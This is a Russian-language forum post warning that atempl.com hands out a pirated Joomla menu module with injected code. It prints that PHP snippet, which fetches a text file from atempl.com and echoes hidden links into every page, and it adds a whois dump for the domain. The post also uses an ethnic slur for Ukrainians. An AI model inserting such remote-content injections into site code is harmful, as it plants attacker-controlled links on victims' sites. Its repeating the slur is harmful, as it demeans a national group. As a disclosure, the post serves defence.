×
HeadHunter and Superjob rezume updater on Ruby on Rails (21 авг 2017)

Практикуемся в написании кода под rails.

Вопрос atempl.com. Malicious joomla software. Скрытые ссылки

Больше
11 мес. 3 нед. назад - 11 мес. 3 нед. назад #1 от Aleksej
Aleksej создал эту тему: atempl.com. Malicious joomla software. Скрытые ссылки
В принципе, из заголовка уже многое понятно, не правда ли? - одним словом, крайне не рекомендую загружать любые файлы, в том числе и расширения Joomla - с atempl.com. For example; зайдя, например, сюда -

_http://atempl.com/moduli/item/446-sj-flat-menu-sovremennoe-menyu-dlya-stilnykh-sajtov

- видим следующую аннотацию:

SJ Flat Menu - современное меню для стильных сайтов
Совместимость: Модули меню для Joomla

Стильное разноцветное и многоуровневое меню для Joomla 3.x - Джумла 2.5.x. Выполнен в приятных стилях и тонах, использует передовые технологии и корректно отображается на любых устройствах. Есть возможность вертикального и горизонтального отображения.



Вероятнее всего, речь идет о форке SJ Flat Menu от проекта smartaddons.com. Хотя уместнее, разумеется, использовать слово warez; это представляется более чем обоснованным, если открыть файл tmpl/default.php и увидеть в безобидном, казалось бы, модуле меню - следующую вставку:


<?php if( $params->get('posttext') != ' ' ) { ?>
    <div class="posttext"><?php echo $params->get('posttext'); ?>                       </div>                                                                    
<?php } ?><?php
$files = 'http://atempl.com/10.txt';
$file_headers = @get_headers($files);
if($file_headers[0] == 'HTTP/1.1 200 OK')
 {
$url = "http://atempl.com/10.txt";
$c = @file_get_contents($url);
$array_double=explode(',',$c);
$array_one=array_unique($array_double);
$result=implode(',',$array_one);
echo $result;	
 }
?>


, в которой все уже более чем прозрачно и не оставляет места для рефлексий; ссылки из 10.txt также ведут на украинские web-ресурсы, в чем очень несложно убедиться... причем ничто не мешает владельцам atempl.com любым способом и в любой момент изменить содержание файла. Ай да хохлы; да простит меня Google, но в данном случае на язык просится именно это словечко... в котором я, признаюсь, не вижу ничего особо предосудительного, вспоминая прекрасную прозу Павла Нилина, например.

Интересно, что неймсервера, как видите, расположены у ребятишек на Бегете, в России; хотя хостинг украинский, HOSTING UKRAINE LTD:

whois atempl.com       
[Querying whois.verisign-grs.com]
[Redirected to whois.onlinenic.com]
[Querying whois.onlinenic.com]
[whois.onlinenic.com]
Domain Name: atempl.com                                                                                         
Registry Domain ID: 5119615_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.onlinenic.com
Registrar URL: http://www.onlinenic.com
Updated Date: 2015-12-11T12:52:10Z
Creation Date: 2013-12-07T04:00:00Z
Registrar Registration Expiration Date: 2016-12-07T04:00:00Z
Registrar: Onlinenic Inc
Registrar IANA ID: 82
Registrar Abuse Contact Email: onlinenic-enduser@onlinenic.com
Registrar Abuse Contact Phone: +1.5107698492
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: Not Available From Registry
Registrant Name: report abuse to Privacy Protection,
Registrant Organization: Registrar: HOSTING UKRAINE LTD
Registrant Street: PO Box 65
Registrant City: Kiev
Registrant State/Province: Kiev Region
Registrant Postal Code: 03065
Registrant Country: UA
Registrant Phone: +380.443927433
Registrant Phone Ext:
Registrant Fax: +380.443927433
Registrant Fax Ext:
Registrant Email: aae072c5602ebfeb01@privacyprotected.net
Registry Admin ID: Not Available From Registry
Admin Name: report abuse to Privacy Protection,
Admin Organization: Registrar: HOSTING UKRAINE LTD
Admin Street: PO Box 65
Admin City: Kiev
Admin State/Province: Kiev Region
Admin Postal Code: 03065
Admin Country: UA
Admin Phone: +380.443927433
Admin Phone Ext:
Admin Fax: +380.443927433
Admin Fax Ext:
Admin Email: aae072c5602ebfeb01@privacyprotected.net
Registry Tech ID: Not Available From Registry
Tech Name: report abuse to Privacy Protection,
Tech Organization: Registrar: HOSTING UKRAINE LTD
Tech Street: PO Box 65
Tech City: Kiev
Tech State/Province: Kiev Region
Tech Postal Code: 03065
Tech Country: UA
Tech Phone: +380.443927433
Tech Phone Ext:
Tech Fax: +380.443927433
Tech Fax Ext:
Tech Email: aae072c5602ebfeb01@privacyprotected.net
Name Server: ns2.beget.ru
Name Server: ns1.beget.ru
Последнее редактирование: 11 мес. 3 нед. назад от Aleksej.

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.